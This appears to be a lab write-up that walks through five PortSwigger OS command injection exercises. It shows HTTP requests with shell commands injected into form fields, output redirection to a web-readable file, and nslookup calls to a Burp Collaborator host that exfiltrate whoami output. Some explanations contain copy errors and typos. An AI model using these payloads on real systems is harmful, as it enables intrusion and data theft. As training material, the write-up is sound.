Command Injection Labs
LAB #1: OS command injection - a simple case
Lab URL: https://portswigger.net/web-security/os-command-injection/lab-simple
Objective: Execute the whoami
command to determine the name of the current user.
This lab contains a shopping application that has different no of products for purchase. Each product has Check Stock
a functionality in which we can see which products are in stock.
For checking the stock they are sending the POST request to the /product/stock
endpoint with the following parameters.
productId=1&storeId=1
If we change the productID
with %26woami||
we can successfully execute the shell commands.
LAB #2: Blind OS command injection with time delays
Lab URL: https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays
Objective: Exploit the blind OS command that causes a 10-second delay.
This lab contains a shopping application that has a different number of products for purchase. The site also has submit feedback
functionality on /feedback/submit
. We can submit feedback using a POST request with the parameters csrf
, name
, email
, subject
, and message
. This request looks like the following.
POST /feedback/submit HTTP/2
Host: 0a570077046bf0ec819c20e200ff00fc.web-security-academy.net
Cookie: session=vvR2TvdcvgzSfd9Gk9hSwbgJ06skpFgQ
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
Origin: https://0a570077046bf0ec819c20e200ff00fc.web-security-academy.net
Dnt: 1
Referer: https://0a570077046bf0ec819c20e200ff00fc.web-security-academy.net/feedback
csrf=TDzkG4ZyyhjE890Ojvukl4FNTgNQhHhE&name=temp&email=temp%40temp.com&subject=anything&message=hello
If we change the email parameter like the following we will see certain seconds of time delay in our response.
csrf=TDzkG4ZyyhjE890Ojvukl4FNTgNQhHhE&name=temp&email=temp%40temp.com||ping+-c+10+localhost||&subject=anything&message=hello
There we use ||
to break the shell command and then add a ping command localhost
that will send total request pings after that we separate the remaining command with the ||
character. They are using OS native email functionality to send an email that gets the email
, and subject
like this.
mail –s "anything" temp@temp.com
They add our user-supplied email without any validation into the shell command and with that, the above shell command becomes like this
mail -s "anything" temp@temp.com||ping -c 10 localhost||
LAB #3: Blind OS command injection with output redirection
Lab URL: https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection
Objective: Execute the whoami
command and retrieve its output.
This lab contains a shopping application that has a different number of products for purchase. The site also has a submit feedback
functionality on /feedback/submit
. We can submit feedback using a POST request with the parameters csrf
, name
, email
, subject
, and message
. This request looks like the following.
POST /feedback/submit HTTP/2
Host: 0ab000790446117e80a412330022000c.web-security-academy.net
Cookie: session=0YWiP22CUfWGE4dcvQS2B7XyRJmCzj7x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
Origin: https://0ab000790446117e80a412330022000c.web-security-academy.net
Dnt: 1
Referer: https://0ab000790446117e80a412330022000c.web-security-academy.net/feedback
csrf=cmzN16GjRkBRjSFUpK8pLBr9URq7ytvn&name=temp&email=temp%40temp.com&subject=temp&message=temp%0A
If we change the email parameter like the following we will see certain seconds of time delay in our response.
csrf=cmzN16GjRkBRjSFUpK8pLBr9URq7ytvn&name=temp&email=temp%40temp.com||sleep+10||&subject=temp&message=temp%0A
There we use ||
to break the shell command and then add a ping command to send a ping
to localhost
that will send total request pings after that we separate the remaining command with the ||
character. They use OS-native email functionality to send an email that gets the email
, and subject
like this.
mail –s "anything" temp@temp.com
They add our user-supplied email without any validation into the shell command and with that, the above shell command becomes like this
mail -s "anything" temp@temp.com||ping -c 10 localhost||
Confirming we have a blind command injection we can run any command and redirect its output to a file in a readable directory. After that, we can read that file by visiting that file URL in the browser. So the steps should look like the following.
POST /feedback/submit HTTP/2
Host: 0ab000790446117e80a412330022000c.web-security-academy.net
Cookie: session=0YWiP22CUfWGE4dcvQS2B7XyRJmCzj7x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 137
Origin: https://0ab000790446117e80a412330022000c.web-security-academy.net
Dnt: 1
Referer: https://0ab000790446117e80a412330022000c.web-security-academy.net/feedback
Te: trailers
csrf=cmzN16GjRkBRjSFUpK8pLBr9URq7ytvn&name=temp&email=temp%40temp.com||whoami+>+/var/www/images/whoami.txt||&subject=temp&message=temp%0A
There we use the following command in the email parameter.
whoami > /var/www/images/whoami.txt
this executes the whoami
the command that is used to get the username of the currently logged-in user in the OS and then we use the output redirector >
that will redirect the output of the command to a file and writes it so we supplied /var/www/images/whoami.txt
path. In which whoami.txt
is the file created and contains the output of the whoami
command.
As we know the site uses the following url to fetch images.
https://0ab000790446117e80a412330022000c.web-security-academy.net/image?filename=01.png
We can use that to get out the whoami.txt
file like the following.
https://0ab000790446117e80a412330022000c.web-security-academy.net/image?filename=whoami.txt
LAB #4: Blind OS command injection with out-of-band interaction
Lab URL: https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band
Objective: Exploit OS command injection to issue a DNS lookup to Burp Collaborator
This lab contains a shopping application that has a different number of products for purchase. The site also has submit feedback
functionality on /feedback/submit
. We can submit feedback using a POST request with the parameters csrf
, name
, email
, subject
, and message
. This request looks like the following.
POST /feedback/submit HTTP/2
Host: 0a6c00b3049c885780ab4e7900ee00db.web-security-academy.net
Cookie: session=X52KKnSbEHZFBZuXv0FDFb4yzmWsHAf1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Te: trailers
Connection: close
csrf=wV6E44vNhrydBtLgr6UVBB5bbQi0LPb5&name=temp&email=temp%40temp.com&subject=temp&message=temp
If we change the email parameter like the following
csrf=wV6E44vNhrydBtLgr6UVBB5bbQi0LPb5&name=temp&email=temp%40temp.com||sleep+10||&subject=temp&message=temp
we will not see any certain seconds of time delay in our response but if we supplied a burp collaborator domain like this we will see an out-of-band interaction.
csrf=wV6E44vNhrydBtLgr6UVBB5bbQi0LPb5&name=temp&email=temp%40temp.com||nslookup+gn7rxenzjteskktdr2zxjnkxjoped3.oastify.com||&subject=temp&message=temp
LAB #5: Blind OS command injection with out-of-band data exfiltration
Lab URL: https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration
Objective: Exploit OS command injection to do an out-of-band interaction to exfiltrate the output of whoami
command.
This lab contains a shopping application that has a different number of products for purchase. The site also has submit feedback
functionality on /feedback/submit
. We can submit feedback using a POST request with the parameters csrf
, name
, email
, subject
, and message
. This request looks like the following.
POST /feedback/submit HTTP/2
Host: 0a6c00b3049c885780ab4e7900ee00db.web-security-academy.net
Cookie: session=X52KKnSbEHZFBZuXv0FDFb4yzmWsHAf1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Te: trailers
Connection: close
csrf=wV6E44vNhrydBtLgr6UVBB5bbQi0LPb5&name=temp&email=temp%40temp.com&subject=temp&message=temp
If we change the email parameter like the following
csrf=wV6E44vNhrydBtLgr6UVBB5bbQi0LPb5&name=temp&email=temp%40temp.com||sleep+10||&subject=temp&message=temp
we will not see any certain seconds of time delay in our response but if we supplied a burp collaborator domain like this we will see an out-of-band interaction.
csrf=wV6E44vNhrydBtLgr6UVBB5bbQi0LPb5&name=temp&email=temp%40temp.com||nslookup+gn7rxenzjteskktdr2zxjnkxjoped3.oastify.com||&subject=temp&message=temp
Knowing there is a command injection vulnerability we can exfiltrate data like the following.
csrf=wV6E44vNhrydBtLgr6UVBB5bbQi0LPb5&name=temp&email=temp%40temp.com||nslookup+`whoami`.gn7rxenzjteskktdr2zxjnkxjoped3.oastify.com||&subject=temp&message=temp
There we use backticks to run the inline shell command and append its output to our burp collaborator subdomain. So when this command run we will see the username of the currently logged-in user with the domain name like the following in our burp collaborator logs.
peter.gn7rxenzjteskktdr2zxjnkxjoped3.oastify.com
Last updated
Was this helpful?